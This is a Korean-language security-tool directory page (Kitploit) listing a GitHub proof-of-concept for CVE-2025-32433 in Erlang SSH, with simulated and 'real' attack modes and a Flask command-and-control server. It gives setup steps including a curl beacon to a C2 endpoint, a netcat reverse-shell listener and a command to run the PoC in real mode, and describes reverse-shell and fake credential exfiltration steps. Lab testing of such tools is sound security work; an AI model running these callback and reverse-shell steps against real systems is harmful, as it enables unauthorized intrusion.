Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
POC_CVE-2025-32433 — CVE-2025-32433에 대한 개념 증명 익스플로잇으로, 시뮬레이션 및 실제 공격 모드를 포함하며, 리버스 셸 콜백 및 사후 공격 시뮬레이션을 위한 Flask 기반 C2 서버가 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/ekomssavior/poc_cve-2025-32433
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubekomssavior/poc_cve-2025-32433

POC_CVE-2025-32433

CVE-2025-32433에 대한 개념 증명 익스플로잇으로, 시뮬레이션 및 실제 공격 모드를 포함하며, 리버스 셸 콜백 및 사후 공격 시뮬레이션을 위한 Flask 기반 C2 서버가 포함되어 있습니다.

저장소 보기
5271년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

⚠️ 윤리적 고지

이 저장소는 실제 CVE(CVE-2025-32433)를 시연하는 코드를 포함하고 있습니다.
명시적 승인이 있는 환경에서만 사용하십시오.

소유하거나 관리하지 않는 시스템에 대해 이 익스플로잇을 절대 테스트하지 마십시오.
무단 사용은 불법이며, 비윤리적이며, 사이버보안 커뮤니티에 해롭습니다.

CVE-2025-32433에 대한 시뮬레이션 및 실제 PoC

내 친구 Chocapikk가 이 발견된 poc erling_cve.py를 보여줬는데, 흥미가 생겨 안전한 환경에서 테스트해보고 싶었습니다.

이 저장소에는 두 가지 선택지가 있습니다. 아래에 설명하는 안전한 시뮬레이션 스크립트와 시스템입니다.

또는 실제 erling_cve.py를 사용할 수 있습니다 (윤리적인 방식으로 주의를 기울이고 테스트 권한이 있는 네트워크에서만).

이 도구를 사용하여 실제 익스플로잇을 테스트하거나 실행하기 전에 내 친구 m0usemm0use와 그의 Python 스크립트를 확인하여 CVE-2025-32433의 취약한 대상을 찾으십시오!!!!

https://github.com/m0usem0use/erl_mouse


CVE-2025-32433에 대한 익스플로잇 시뮬레이션 버전

C2 서버 설정

Python Flask 기반 C2 구축: 봇 콜백 또는 리버스 셸에 강력합니다.

C2 서버에서 이 설정 스크립트를 실행하십시오

apt update && apt install python3-pip git -y

sudo apt install python3-flask

mkdir ~/c2

cd ~/c2

nano c2_server.py (paste in c2_server script edit as needed)

run

python3 c2_server.py

봇(또는 테스트 스크립트)은 다음과 같이 curl로 홈에 접속할 수 있습니다

curl -X POST http://:8080/report -d "Bot is online"

Kali에서 Python venv 설정

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

Python 가상 환경 생성

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

콜백 테스트

nano test_callback.py (paste in test_callback script and edit as needed)

콜백 실행

python3 test_callback.py

이제 공식적으로 다음을 갖추게 되었습니다

작동하는 venv

실시간 클라우드 C2

기능적인 콜백 인젝션

-대상/피해자 머신에 Erlang 프로세스 또는 서비스가 노출되어 있어야 합니다 (또는 시뮬레이션).


Eerling_cve.py는 무엇을 하나요?

  • 대상 IP의 포트 22에 연결
  • 가짜 SSH 버전 문자열 전송
  • 조작된 패킷 전송 (취약점을 트리거할 가능성이 있음 — Erlang의 문서화되지 않은 SSH 핸들러나 버퍼 오버플로우를 악용하는 척)
  • 공격자 IP로 리버스 셸 트리거
  • whoami, uname과 같은 명령을 실행하고 /tmp/exfil.log로 가짜 "자격 증명 유출"을 시뮬레이션하여 사후 침투 시뮬레이션

우리가 찾은 Erlang 스타일 PoC를 가져와서

  • Kali venv 내에서 기능적으로 만듭니다
  • "공격"이 실행될 때 우리의 클라우드 C2에 보고하도록 연결합니다
  • 통제된 실험실 내에서 윤리적이고 안전하게 실행합니다
  • 도난 데이터를 시뮬레이션하기 위해 /tmp/exfil.log를 생성하는 것을 확인합니다

Kali 머신에서

nano poc_erlang_test.py

-paste in poc_erlang_test.py and edit as needed

리스너 열기

새 터미널에서 실행

nc -lvnp 4444

PoC 실행

python poc_erlang_test.py --real

도구 다운로드